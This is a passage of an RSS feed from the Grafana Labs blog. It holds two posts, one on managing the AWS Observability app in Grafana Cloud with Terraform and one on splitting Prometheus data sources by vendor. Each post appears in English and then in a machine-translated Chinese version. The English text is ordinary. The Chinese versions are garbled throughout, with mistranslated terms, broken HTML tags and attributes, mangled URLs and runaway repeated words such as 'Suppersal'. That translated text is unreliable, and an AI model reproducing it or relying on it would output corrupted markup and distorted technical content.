<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Grafana Labs blog on Grafana Labs</title>
    <link>/blog/index.xml</link>
    <description>Recent content in Grafana Labs blog on Grafana Labs</description>
    <item>
      <title>【Grafana Cloud: Manage the AWS Observability app as code with Terraform】Grafana Cloud：将AWS可观察性应用程序视为带有Terraform的代码</title>
      <link>https://grafana.com/blog/2025/06/24/grafana-cloud-manage-the-aws-observability-app-as-code-with-terraform/</link>
      <description>【&lt;p&gt;Imagine setting up your AWS configuration in Grafana Cloud by hand and clicking through menus. When you only have a few services, it’s not a big deal. But as you add more and more, keeping track of every little change becomes a headache. It’s easy to make mistakes, and before you know it, things can get out of sync and your monitoring becomes unreliable.&lt;/p&gt;&#xA;&lt;p&gt;Now picture using Terraform instead. You write down exactly how you want your AWS services to be set up in a simple, clear format—like writing a recipe. This “recipe” is saved and tracked, so you always know what’s been changed and when. If something goes wrong, you can easily go back to a previous version. Setting up new monitoring configuration becomes quick and automatic, ensuring everything is consistent every single time.&lt;/p&gt;&#xA;&lt;p&gt;Using code to manage your&#xA;&lt;a href=&#34;/docs/grafana-cloud/monitor-infrastructure/monitor-cloud-provider/aws/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;AWS Observability&lt;/a&gt; application just makes things much smoother and more dependable as you grow, and in this blog we&amp;rsquo;ll show you how to do just that.&lt;/p&gt;&#xA;&lt;h3 id=&#34;manage-aws-configuration-in-grafana-cloud-with-terraform&#34;&gt;Manage AWS configuration in Grafana Cloud with Terraform&lt;/h3&gt;&#xA;&lt;p&gt;Using infrastructure as code is crucial for maintaining consistency, reproducibility, and efficiency in cloud environments. If you&amp;rsquo;re a Grafana Cloud user leveraging our AWS integration, you can benefit immensely from exporting your current configuration to Terraform. This allows you to manage your Grafana Cloud setup alongside your AWS infrastructure using a declarative approach.&lt;/p&gt;&#xA;&lt;p&gt;Using Terraform for your AWS Observability app in Grafana Cloud offers several benefits. For example, you can:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Track changes to your Grafana Cloud configuration with Git for version control.&lt;/li&gt;&#xA;&lt;li&gt;Automate deployments and updates to your Grafana Cloud-AWS integration.&lt;/li&gt;&#xA;&lt;li&gt;Ensure consistency of your Grafana Cloud setup across various environments and reduce config redundancy, aligning with DRY(Don’t Repeat Yourself).&lt;/li&gt;&#xA;&lt;li&gt;Facilitate team collaboration on infrastructure changes.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;how-to-export-aws-configuration-in-grafana-cloud-to-terraform&#34;&gt;How to export AWS configuration in Grafana Cloud to Terraform&lt;/h2&gt;&#xA;&lt;p&gt;Follow these steps to get started: &lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt;&lt;strong&gt;Access Grafana Cloud:&lt;/strong&gt; Log in to your Grafana Cloud account. (If you don&amp;rsquo;t already have one, you can&#xA;&lt;a href=&#34;/auth/sign-up/create-user/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;sign up for a forever-free account&lt;/a&gt; today.)&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Navigate to integrations:&lt;/strong&gt; In your Grafana Cloud stack, expand &amp;ldquo;Cloud provider&amp;rdquo; in the main menu. Click &lt;strong&gt;AWS&lt;/strong&gt;, then click on the &lt;strong&gt;Configuration&lt;/strong&gt; tab. Click on the &lt;strong&gt;AWS accounts&lt;/strong&gt; tile. Choose the &lt;strong&gt;account&lt;/strong&gt; you want to export the Terraform configuration for.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Export configuration:&lt;/strong&gt; Click on &lt;strong&gt;Actions&lt;/strong&gt;, then on &lt;strong&gt;Export as Terraform&lt;/strong&gt;. A modal with the Terraform code should appear.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Copy Terraform code:&lt;/strong&gt; Click &lt;strong&gt;Copy to clipboard&lt;/strong&gt; to copy all of the code and paste it in your file.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Initialize Terraform:&lt;/strong&gt; Run &lt;code&gt;terraform init&lt;/code&gt; in the directory containing the downloaded files.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Plan changes:&lt;/strong&gt; Execute &lt;code&gt;terraform plan&lt;/code&gt; to review the proposed changes.&lt;/li&gt;&#xA;&lt;li&gt;&lt;strong&gt;Apply changes:&lt;/strong&gt; Apply the configuration with &lt;code&gt;terraform apply&lt;/code&gt;.&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;div&#xA;x-data=&#34;{ vimeo_is_up: false, responded: false }&#34;&#xA;x-init=&#34;fetch(`https://vimeo.com/api/oembed.json?url=https://vimeo.com/1095043124`)&#xA;.then(response =&gt; {&#xA;responded = true;&#xA;response &amp;&amp; response.status === 200 ? vimeo_is_up = true : vimeo_is_up = false;&#xA;})&#xA;.catch(error =&gt; {&#xA;responded = true;&#xA;})&#34;&#xA;x-cloak&gt;&#xA;&lt;figure class=&#34;p-0 m-0&#34;&gt;&#xA;&lt;template x-if=&#34;vimeo_is_up&#34;&gt;&#xA;&lt;div class=&#34;my-1&#34; style=&#34;position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;&#34;&gt;&#xA;&lt;iframe src=&#34;https://player.vimeo.com/video/1095043124?transparent=0&#34; style=&#34;position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;&#34; title=&#34;vimeo video&#34; webkitallowfullscreen mozallowfullscreen allowfullscreen&gt;&lt;/iframe&gt;&#xA;&lt;/div&gt;&#xA;&lt;/template&gt;&#xA;&lt;template x-if=&#34;responded &amp;&amp; !vimeo_is_up&#34;&gt;&#xA;&lt;p class=&#34;bg-gray-17 p-1&#34;&gt;There&amp;rsquo;s supposed to be a video here, but for some reason there isn&amp;rsquo;t. Either we entered the id wrong (oops!), or Vimeo is down. If it&amp;rsquo;s the latter, we&amp;rsquo;d expect they&amp;rsquo;ll be back up and running soon. In the meantime,&#xA;&lt;a href=&#34;/blog/&#34;&gt;check out our blog&lt;/a&gt;!&lt;/p&gt;&#xA;&lt;/template&gt;&#xA;&lt;/figure&gt;&#xA;&lt;/div&gt;&#xA;&lt;p&gt;To get started, use this example snippet for your Terraform configuration:&lt;/p&gt;&#xA;&lt;div class=&#34;code-snippet code-snippet__mini&#34;&gt;&lt;div class=&#34;lang-toolbar__mini&#34;&gt;&#xA;&lt;span class=&#34;code-clipboard&#34;&gt;&#xA;&lt;button x-data=&#34;app_code_snippet()&#34; x-init=&#34;init()&#34; @click=&#34;copy()&#34;&gt;&#xA;&lt;img class=&#34;code-clipboard__icon&#34; src=&#34;/media/images/icons/icon-copy-small-2.svg&#34; alt=&#34;Copy code to clipboard&#34; width=&#34;14&#34; height=&#34;13&#34;&gt;&#xA;&lt;span&gt;Copy&lt;/span&gt;&#xA;&lt;/button&gt;&#xA;&lt;/span&gt;&#xA;&lt;/div&gt;&lt;div class=&#34;code-snippet code-snippet__border&#34;&gt;&#xA;&lt;pre data-expanded=&#34;false&#34;&gt;&lt;code class=&#34;language-none&#34;&gt;resource &amp;#34;grafana_cloud_provider_aws_account&amp;#34; &amp;#34;example_account&amp;#34; {&#xA;stack_id = &amp;#34;your_stack_id&amp;#34;&#xA;role_arn = &amp;#34;your_arn&amp;#34;&#xA;regions = [&amp;#34;us-east-2&amp;#34;]&#xA;# ... other configuration details ...&#xA;}&lt;/code&gt;&lt;/pre&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt;&lt;p&gt;From there, iterate to meet your needs. Using this approach enhances control, automation, and collaboration—ultimately leading to a more robust and efficient monitoring setup.&lt;/p&gt;&#xA;&lt;p&gt;&lt;em&gt;&#xA;&lt;a href=&#34;/products/cloud/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Grafana Cloud&lt;/a&gt; is the easiest way to get started with metrics, logs, traces, dashboards, and more. We have a generous forever-free tier and plans for every use case.&#xA;&lt;a href=&#34;/auth/sign-up/create-user/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; Sign up for free now&lt;/a&gt;!&lt;/em&gt;&lt;/p&gt;】&lt;p&gt;想象一下，通过手动将AWS配置设置在Grafana Cloud中，然后单击菜单。当您只有一些服务时，这没什么大不了的。但是，随着您越来越多的添加，跟踪每一个小变化就会成为头痛。犯错很容易，在您不知不觉中，事情可能会摆脱同步，并且您的监视变得不可靠。&lt;/p&gt;&#xA;&lt;p&gt;现在使用Terraform图片。您准确地写下了如何以简单，清晰的格式设置AWS服务（例如编写食谱）。保存和跟踪此“食谱”，因此您始终知道发生了什么变化以及何时发生了变化。如果出现问题，您可以轻松地回到以前的版本。设置新的监视配置变得快速且自动，以确保每次都保持一致。&lt;/p&gt;&#xA;&lt;p&gt;使用代码管理您的&#xA;&lt;a href =“/docs/docs/grafana-cloud/Monitor-infrastructure/monitor-cloud-provider/aws/？pg = blog＆plcmt = body-txt”&gt; aws observability &lt;/a&gt;应用程序只会使事情变得更加柔软，随着您的成长而变得更加柔软，更可靠，在这个博客中，我们会向您展示如何做到这一点。&#xA;&lt;h3 id =“ manage-aws-configuration in grafana-cloud-with-terraform”&gt;在Grafana Cloud中管理AWS配置，带有Terraform &lt;/h3&gt;&#xA;&lt;p&gt;使用基础架构作为代码对于保持云环境中的一致性，可重复性和效率至关重要。如果您是Grafana Cloud用户利用我们的AWS集成，则可以从将当前配置导出到Terraform中受益匪浅。这使您可以使用声明的方法与AWS基础架构一起管理Grafana云设置。&lt;/p&gt;&#xA;&lt;p&gt;在Grafana Cloud中使用Terraform为您的AWS可观察性应用程序提供了一些好处。例如，您可以：&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;曲目更改您的Grafana Cloud配置，其中git用于版本控制。&lt;/li&gt;&#xA;&lt;li&gt;自动部署并更新您的grafana cloud-aws集成。&lt;/li&gt;&#xA;&lt;li&gt;确保在各种环境中设置Grafana云的一致性并减少配置冗余，并与干燥（不要重复自己）。&lt;/li&gt;&#xA;&lt;li&gt;促进基础设施变化的团队合作。&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id =“ how-to-export-aws-configuration in grafana-cloud-to-terraform”&gt;如何导出Grafana Cloud中的AWS配置到Terraform &lt;/h2&gt;&#xA;&lt;p&gt;按照以下步骤开始：&lt;/p&gt;&#xA;&lt;ol&gt;&#xA;&lt;li&gt; &lt;strong&gt;访问Grafana云：&lt;/strong&gt;登录到您的Grafana云帐户。 （如果您还没有，您可以&#xA;&lt;a href =“/auth/inper-up/create-user/？pg = blog＆plcmt = body-txt”&gt;注册永远免费的帐户&lt;/a&gt;今天。）&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;导航到集成：&lt;/strong&gt;在您的Grafana云堆栈中，在主菜单中展开“云提供商”。单击&lt;strong&gt; aws &lt;/strong&gt;，然后单击&lt;strong&gt;配置&lt;/strong&gt;选项卡。单击&lt;strong&gt; AWS帐户&lt;/strong&gt;瓷砖。选择&lt;strong&gt;帐户&lt;/strong&gt;您想导出的Terraform配置。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;导出配置：&lt;/strong&gt;单击&lt;strong&gt;动作&lt;/strong&gt;，然后以&lt;strong&gt;出口为Terraform &lt;/strong&gt;。具有Terraform代码的模态应出现。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;复制Terraform代码：&lt;/strong&gt;单击&lt;strong&gt;复制剪贴板&lt;/strong&gt;复制所有代码并将其粘贴到您的文件中。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;初始化Terraform：&lt;/strong&gt;运行&lt;code&gt; Terraform Init &lt;/code&gt;在包含下载文件的目录中。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;计划更改：&lt;/strong&gt;执行&lt;code&gt; Terraform Plan &lt;/code&gt;查看所提出的更改。&lt;/li&gt;&#xA;&lt;li&gt; &lt;strong&gt;应用更改：&lt;/strong&gt;使用&lt;code&gt; Terraform应用配置应用&lt;/code&gt;。&lt;/li&gt;&#xA;&lt;/ol&gt;&#xA;&lt;div&#xA;x-data =“ {vimeo_is_up：false，响应：false}”&#xA;x-init =“ fetch（`https：//vimeo.com/api/oembed.json？url = https：//vimeo.com/1095043124`）&#xA;然后（响应=&gt; {&#xA;响应= true;&#xA;响应&amp;&amp; response.status === 200？ vimeo_is_up = true：vimeo_is_up = false;&#xA;}））&#xA;.catch（错误=&gt; {&#xA;响应= true;&#xA;}）””&#xA;X-Cloak&gt;&#xA;&lt;figie class =“ P-0 M-0”&gt;&#xA;&lt;template x-if =“ vimeo_is_up”&gt;&#xA;&lt;div class =“ my-1” style =“位置：相对; padding-bottom：56.25％;高度：0;溢出：隐藏;&#xA;&lt;iframe src =“ https://player.vimeo.com/video/1095043124？transparent = 0“ style =”位置：绝对; absolute; top; top; top：0; left; left：0; width; width：100％;高度：100％; 100％; 100％; border：0; border：0; border：0;&#39;;“ title =“ vimeo视频” webkitallowlscreen mozallowlscreen允许screen&gt; &lt;/iframe&gt;&#xA;&lt;/div&gt;&#xA;&lt;/template&gt;&#xA;&lt;template x-if =“响应&amp;&amp;！vimeo_is_up”&gt;&#xA;&lt;p class =“ bg-gray-17 p-1”&gt;这里应该有一个视频，但由于某种原因没有。我们要么输入ID错误（糟糕！），要么Vimeo降低了。如果是后者，我们希望他们很快就会备份。同时，&#xA;&lt;a href =“/blog/”&gt;查看我们的博客&lt;/a&gt;！&lt;/p&gt;&#xA;&lt;/template&gt;&#xA;&lt;/figure&gt;&#xA;&lt;/div&gt;&#xA;&lt;p&gt;要开始，请使用此示例代码段进行Terraform配置：&lt;/p&gt;&#xA;&lt;div class =“ code-snippet code-snippet__mini”&gt; &lt;div class =“ lang-toolbar__mini”&gt;&#xA;&lt;span class =“ code-clipboard”&gt;&#xA;&lt;button x-data =“ app_code_snippet（）” x-init =“ init（）” @click =“ copy（）”&gt;&#xA;&lt;img class =“ code-clipboard__icon” src =“/媒体/images/icons/icon-copy-small-2.svg” alt =“复制代码到剪贴板” width =“ 14”高度=“ 13”&gt;&#xA;&lt;span&gt;复制&lt;/span&gt;&#xA;&lt;/button&gt;&#xA;&lt;/span&gt;&#xA;&lt;/div&gt; &lt;div class =“代码 - 尼珀代码snippet__border”&gt;&#xA;&lt;pre data-expanded =“ false”&gt; &lt;code class =“ language-none”&gt;资源“ grafana_cloud_provider_aws_account”“ example_account” {&#xA;stack_id =“ your_stack_id”&#xA;角色_arn =“ your_arn”&#xA;区域= [“ us-east-2”]&#xA;＃...其他配置详细信息...&#xA;} &lt;/code&gt; &lt;/pre&gt;&#xA;&lt;/div&gt;&#xA;&lt;/div&gt; &lt;p&gt;从那里迭代以满足您的需求。使用这种方法可以增强控制，自动化和协作 - 最终导致更强大，更有效的监视设置。&lt;/p&gt;&#xA;&lt;p&gt; &lt;em&gt;&#xA;&lt;a href =“/products/cloud/？pg = blog＆plcmt = body-txt”&gt; grafana cloud &lt;/a&gt;是从指标，日志，痕迹，痕迹，仪表板等开始的最简单方法。我们有一个宽敞的永远的层次，并为每个用例都有计划。&#xA;&lt;a href =“//auth/ign-up/create-user/？pg = blog＆plcmt = body-txt”&gt;立即免费注册&lt;/a&gt;！ &lt;/em&gt; &lt;/p&gt;</description>
      <pubDate>Tue, 24 Jun 2025 00:00:00 +0000</pubDate>
    </item>
    <item>
      <title>【Prometheus data source update: Redefining our big tent philosophy】Prometheus数据源更新：重新定义我们的大帐篷理念</title>
      <link>https://grafana.com/blog/2025/06/16/prometheus-data-source-update-redefining-our-big-tent-philosophy/</link>
      <description>【&lt;blockquote&gt;&#xA;&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This blog post was originally published on Aug. 6, 2024. It has been updated to reflect changes to our Prometheus support for Microsoft Azure and to our roadmap.&lt;/p&gt;&lt;/blockquote&gt;&#xA;&lt;p&gt;As we continue adding to our growing catalog of more than 100 plugins for Grafana, we have been focused on developing data sources for Grafana that are more purpose-built for the respective technologies.&lt;/p&gt;&#xA;&lt;p&gt;An example of this has been how we&amp;rsquo;ve updated our core Prometheus data source. Last year we deprecated AWS authentication from the original Prometheus data source, and we created a new dedicated&#xA;&lt;a href=&#34;/grafana/plugins/grafana-amazonprometheus-datasource/?pg=blog&amp;amp;plcmt=body-txt&amp;amp;tab=overview&#34;&gt; Amazon Managed Service for Prometheus plugin&lt;/a&gt; that specifically catered to the AWS use case. If you are a Grafana user who uses Amazon Managed Prometheus (AMP), you can learn more about how to install or migrate to the new plugin in&#xA;&lt;a href=&#34;/grafana/plugins/grafana-amazonprometheus-datasource/?pg=blog&amp;amp;plcmt=body-txt&amp;amp;tab=overview&#34;&gt; our Amazon Managed Service for Prometheus documentation&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;More recently, we deprecated Microsoft Azure authentication from the original Prometheus data source in Grafana 12, and we built a new dedicated&#xA;&lt;a href=&#34;/grafana/plugins/grafana-azureprometheus-datasource/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Azure Monitor Managed Service for Prometheus&lt;/a&gt; plugin that specifically caters to Azure use cases. Users can now connect to Azure Monitor Managed Prometheus data source using&#xA;&lt;a href=&#34;https://learn.microsoft.com/en-us/azure/app-service/configure-authentication-user-identities&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt;Azure’s current user authentication&lt;/a&gt;. You can learn more about installing and migrating to the new plugin in our&#xA;&lt;a href=&#34;/grafana/plugins/grafana-azureprometheus-datasource/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;Azure Monitor Managed Service for Prometheus documentation&lt;/a&gt;. &lt;/p&gt;&#xA;&lt;p&gt;And we will continue to explore how to make other data sources in the Grafana ecosystem more purpose-built over time.&lt;/p&gt;&#xA;&lt;h2 id=&#34;a-bigger-big-tent&#34;&gt;A bigger &amp;lsquo;big tent&amp;rsquo;&lt;/h2&gt;&#xA;&lt;p&gt;This refined focus on our data sources is a reflection of our commitment to meet our users where they are.&lt;/p&gt;&#xA;&lt;p&gt;Observability today is a complicated space. Companies of all sizes have adopted numerous open source and commercial tools to monitor an ever expanding sprawl of infrastructure, applications, and even physical devices. In our recent&#xA;&lt;a href=&#34;/observability-survey/?pg=blog&amp;amp;plcmt=body-txt#so.-many.-tools.&#34;&gt; third annual Observability Survey&lt;/a&gt;, the average user said they have 16 data sources configured in Grafana, with companies with more than 5,000 employees averaging 24.&lt;/p&gt;&#xA;&lt;p&gt;It shouldn’t come as a surprise to anyone reading this, that this explosion in observability tools has been a pretty great wave for Grafana Labs to ride thanks to our commitment to our “big tent” philosophy. We believe that organizations should own their observability strategy, have the freedom to choose their own tools, and have the ability to bring all their data together in one view, no matter where it lives. As a result, Grafana has quickly become the de facto visualization tool for centralized observability.&lt;/p&gt;&#xA;&lt;p&gt;But over the years, we have evolved our understanding of what “big tent” stands for. While we still prioritize software interoperability, “big tent” also means surfacing the meaningful differences between data sources so users can form clear expectations and avoid solving for the lowest common denominator. These differences are in the values of each upstream project as much as they are in APIs.&lt;/p&gt;&#xA;&lt;p&gt;In our opinion, data sources with open source and foundation-run projects should be exclusively compatible with the upstream APIs and reflect the project’s vendor neutrality. Vendors adjacent to these open source projects, with their own API and differences, are also invited into the big tent: You can build data sources that are tailored to your specific technology and still reach the Grafana community. (Potential partners can inquire about working directly with us on commercial data source publishing options at&#xA;&lt;a href=&#34;mailto:integrations@grafana.com&#34;&gt;integrations@grafana.com&lt;/a&gt;.) But whether it comes from a commercial partner or the community, we believe that each data source should have a clear purpose and lean into that goal.&lt;/p&gt;&#xA;&lt;p&gt;Prometheus is a standout example. Throughout a decade of development, this open source project has grown into a gold standard for time series metrics data and is critical infrastructure for businesses across the industry. It remains a vibrant and independent project under the governance of the&#xA;&lt;a href=&#34;https://www.cncf.io/&#34; target=&#34;_blank&#34; rel=&#34;noopener noreferrer&#34;&gt; Cloud Native Computing Foundation&lt;/a&gt; (CNCF), with countless open source contributors continuing to evolve the code to support challenges, and a thriving community providing a colossal support apparatus.&lt;/p&gt;&#xA;&lt;p&gt;Users of our core Prometheus data source should expect this data source to closely mirror the functionality developed and supported within this community. The data source itself should not be overcomplicated or otherwise confuse users with proprietary functionality that branches off of the Prometheus project.&lt;/p&gt;&#xA;&lt;p&gt;Meanwhile, the proprietary projects in Prometheus’s orbit should be built and welcomed into the community as separate data sources. This is why we have provided Grafana users who use Amazon Managed Prometheus (AMP) with access to the Amazon Managed Service for Prometheus plugin, which supports platform-specific AWS Signature Version 4 authentication.&lt;/p&gt;&#xA;&lt;p&gt;That&amp;rsquo;s also why we encourage users of Azure Monitor managed service for Prometheus to use the Azure Monitor Managed Service for Prometheus Data Source, which supports Azure authentication methods (e.g., app registration, managed identity, etc.).&lt;/p&gt;&#xA;&lt;h2 id=&#34;whats-next&#34;&gt;What’s next&lt;/h2&gt;&#xA;&lt;p&gt;We feel this “big tent” approach has been a natural evolution we’ve seen in the industry as we continue to field requests for new data sources that span a wide range of licensing models and that support every flavor of platform-specific auth, query language, feature, and more.&lt;/p&gt;&#xA;&lt;p&gt;But interoperability continues to be one of the primary drivers of our roadmap. We maintain&#xA;&lt;a href=&#34;/grafana/plugins/all-plugins/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; 100+ plugins&lt;/a&gt; for Grafana and&#xA;&lt;a href=&#34;/docs/grafana-cloud/data-configuration/integrations/integration-reference/&#34;&gt; 100+ Grafana Cloud integrations&lt;/a&gt; for monitoring third-party tools. Our open source projects, including the core technology behind the Grafana LGTM Stack (&#xA;&lt;a href=&#34;/oss/loki/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; Loki&lt;/a&gt; for logs,&#xA;&lt;a href=&#34;/oss/grafana?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; Grafana&lt;/a&gt; for visualization,&#xA;&lt;a href=&#34;/oss/tempo/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; Tempo&lt;/a&gt; for traces, and&#xA;&lt;a href=&#34;/oss/mimir/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt; Mimir&lt;/a&gt; for metrics), are built on “big tent” principles. We also contribute to OSS projects such as Prometheus (we are the No. 1 company contributor) and OpenTelemetry, with a focus on making the&#xA;&lt;a href=&#34;/blog/2024/11/06/prometheus-3.0-and-opentelemetry-a-practical-guide-to-storing-and-querying-otel-data/&#34;&gt; two projects more interoperable&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;While this is our current thinking on “big tent” and interoperability, we want to continue to listen to our community, partners, and users to better refine our approach. Please reach out to the team at&#xA;&lt;a href=&#34;mailto:integrations@grafana.com&#34;&gt;integrations@grafana.com&lt;/a&gt; if you have any feedback, questions, or concerns.&lt;/p&gt;&#xA;&lt;p&gt;We&amp;rsquo;ve also created a&#xA;&lt;a href=&#34;/docs/grafana-cloud/whats-new/2024-07-24-roadmap-for-new-data-sources/?pg=blog&amp;amp;plcmt=body-txt&#34;&gt;public roadmap&lt;/a&gt; that shows all of the date source plugins being built by Grafana Labs, our partners, and our community. Grafana Cloud users can now see our current plans and request new plugins, upvote existing requests, or comment with ideas and requirements.&lt;/p&gt;&#xA;&lt;p&gt;No matter how you engage with our community, we want to hear from you and learn how we can make Grafana’s “big tent” bigger and better.&lt;/p&gt;】&lt;BlockQuote&gt;&#xA;&lt;p&gt; &lt;strong&gt;注意：&lt;/strong&gt;此博客文章最初于2024年8月6日发表。它已更新以反映我们对Microsoft Azure和Roadmap的Prometheus支持的更改。&lt;/p&gt; &lt;/blockquote&gt;&#xA;&lt;p&gt;随着我们继续为Grafana添加100多个插件的目录时，我们一直致力于为Grafana开发数据源，这些数据源是各自技术的更专门构建的。&lt;/p&gt;&#xA;&lt;p&gt;一个例子是我们如何更新核心Prometheus数据源。去年，我们将AWS身份验证从原始的Prometheus数据源中删除，并创建了一个新的专用&#xA;&lt;a href =“/grafana/plugins/grafana-amazonprometheus-datasource/？pg = blog＆plcmt = body-txt＆tab =概述&gt; Prometheus Plagin &lt;/a&gt;的Amazon托管服务&lt;/a&gt;专门针对AWS用例。如果您是使用亚马逊托管Prometheus（AMP）的Grafana用户，则可以了解有关如何安装或迁移到新插件中的更多信息&#xA;&lt;a href =“/grafana/plugins/grafana-amazonprometheus-datasource/？pg = blog＆plcmt = body-txt＆tab＆tab =概述”&gt;我们的亚马逊托管服务，用于Prometheus Documentation &lt;/a&gt;。&lt;/p&gt;&#xA;&lt;p&gt;最近，我们从Grafana 12中的原始Prometheus数据源中弃用了Microsoft Azure身份验证，我们建立了一个新的专用&#xA;&lt;a href =“/grafana/plugins/grafana-azure-prometheus-datasource/？pg = blog＆plcmt = body-txt”&gt; azure Monitor托管服务的Prometheus &lt;/a&gt;插件专门针对Azure用例。用户现在可以使用Azure Monitor使用&#xA;&lt;a href =“ https://learn.microsoft.com/en-us/azure/app-service/configure-authentication-usterication-user-user-istinities” target =“ _ blank” rel =“ noopener noreferrer”&gt; azure的当前用户诚实&lt;/a&gt;。您可以了解有关安装和迁移到我们的新插件的更多信息&#xA;&lt;a href =“/grafana/plugins/grafana-azureprometheus-datasource/？pg = blog＆plcmt = body-txt”&gt; Prometheus文档的Azure Monitor托管服务&lt;/a&gt;。 &lt;/p&gt;&#xA;&lt;p&gt;，随着时间的流逝，我们将继续探索如何使Grafana生态系统中的其他数据源更加专业。&lt;/p&gt;&#xA;&lt;h2 id =“ a-bigger-big-tent”&gt;更大的&#39;大帐篷&#39;&lt;/h2&gt;&#xA;&lt;p&gt;这种精致的关注我们的数据源反映了我们对用户的承诺。&lt;/p&gt;&#xA;&lt;p&gt;今天的可观察性是一个复杂的空间。各种规模的公司都采用了许多开源和商业工具来监视不断扩大的基础架构，应用程序甚至物理设备的扩展。在我们最近的&#xA;&lt;a href =“/observability-survey/？pg = blog＆plcmt = body-txt＃so.-many.-tools。”&gt;第三次年度可观察性调查&lt;/a&gt;，普通用户说，他们在Grafana配置了16个数据源，拥有超过5,000名员工的公司，平均24个。&#xA;&lt;p&gt;对于任何阅读本文的人来说，这并不令人惊讶，由于我们对我们对“大帐篷”哲学的承诺，这种可观察性工具中的爆炸是一个很大的浪潮。我们相信组织应该拥有自己的可观察性策略，可以自由选择自己的工具，并有能力将所有数据融合在一起，无论其居住地如何。结果，Grafana已迅速成为集中可观察性的事实可视化工具。&lt;/p&gt;&#xA;&lt;p&gt;但是多年来，我们已经发展了我们对“大帐篷”代表什么的理解。尽管我们仍然优先考虑软件互操作性，但“大帐篷”也意味着浮出数据源之间的有意义的差异，以便用户可以形成清晰的期望，并避免解决最低的共同点。这些差异在每个上游项目的值中与API一样多。&lt;/p&gt;&#xA;&lt;p&gt;我们认为，具有开源和基础项目的数据源应与上游API完全兼容，并反映该项目的供应商中立性。与这些开源项目相邻的供应商，具有自己的API和差异，也被邀请到大帐篷中：您可以构建针对您的特定技术量身定制的数据源，并且仍然可以到达Grafana社区。 （潜在的合作伙伴可以询问有关我们直接与我们合作的商业数据源发布选项&#xA;&lt;a href =“ mailto：integrations@grafana.com”&gt; intemprations@grafana.com &lt;/a&gt;。&#xA;&lt;p&gt; Prometheus是一个出色的例子。在整个十年的发展中，这个开源项目已发展为时间序列指标数据的黄金标准，对于整个行业的企业来说是关键的基础架构。它仍然是一个充满活力和独立的项目。&#xA;&lt;a href =“ https://www.cncf.io/” target =“ _ black” rel =“ noopener noreferrer”&gt;云本地计算基金会&lt;/a&gt;（CNCF），无数的开源贡献者继续演变代码，以支持挑战，并提供一个蓬勃发展的社区，并提供一个蓬勃发展的Colossal Suppersal Suppersal Suppersal Suppersal Suppersal Suppersal Suppersal Suppersal Suppersal Suppersal Suppersal Suppersal Suppersal Appatus。&#xA;&lt;p&gt;我们的核心Prometheus数据源的用户应该期望此数据源可以密切反映本社区中开发和支持的功能。数据源本身不应过于复杂，或者以其他方式使用户与专有功能相混淆，该功能从Prometheus项目中分支出来。&lt;/p&gt;&#xA;&lt;p&gt;同时，应作为单独的数据来源建造并欢迎普罗米修斯轨道上的专有项目。这就是为什么我们提供了使用亚马逊托管Prometheus（AMP）的Grafana用户，并访问Prometheus插件的Amazon托管服务，该插件支持平台特定的AWS签名版本4身份验证。&lt;/p&gt;。&lt;/p&gt;&#xA;&lt;p&gt;这也是为什么我们鼓励Prometheus的Azure Monitor托管服务的用户使用Azure Monitor托管服务为Prometheus数据源，该服务支持Azure身份验证方法（例如，应用程序注册，托管身份等）。&lt;/p&gt;。&lt;/p&gt;。&#xA;&lt;H2 id =“ whats-next”&gt;下一步是什么&#xA;&lt;p&gt;我们认为，这种“大帐篷”方法是我们在行业中看到的一种自然发展，因为我们继续对跨越广泛的许可模型的新数据源进行了要求，并支持平台特定的Auth，查询语言，功能等的每种风味。&lt;/p&gt; &lt;/p&gt; &lt;/p&gt; &lt;/p&gt;&#xA;&lt;p&gt;但互操作性仍然是我们路线图的主要驱动力之一。我们坚持&#xA;&lt;a href =“/grafana/plugins/all-plugins/？pg = blog＆plcmt = body-txt”&gt; 100+插件&lt;/a&gt;用于grafana和&#xA;&lt;a href =“/docs/docs/grafana-cloud/data-configuration/Integrations/Integration-reference-reference/”&gt; 100+ Grafana Cloud Integrations &lt;/a&gt;用于监视第三方工具。我们的开源项目，包括Grafana LGTM堆栈背后的核心技术（&#xA;&lt;a href =“/oss/loki/？pg = blog＆plcmt = body-txt”&gt; loki &lt;/a&gt;用于日志，&#xA;&lt;a href =“/oss/grafana？pg = blog＆plcmt = body-txt”&gt; grafana &lt;/a&gt;用于可视化，&#xA;&lt;a href =“/oss/tempo/？pg = blog＆plcmt = body-txt”&gt; tempo &lt;/a&gt;用于痕迹，并且&#xA;&lt;a href 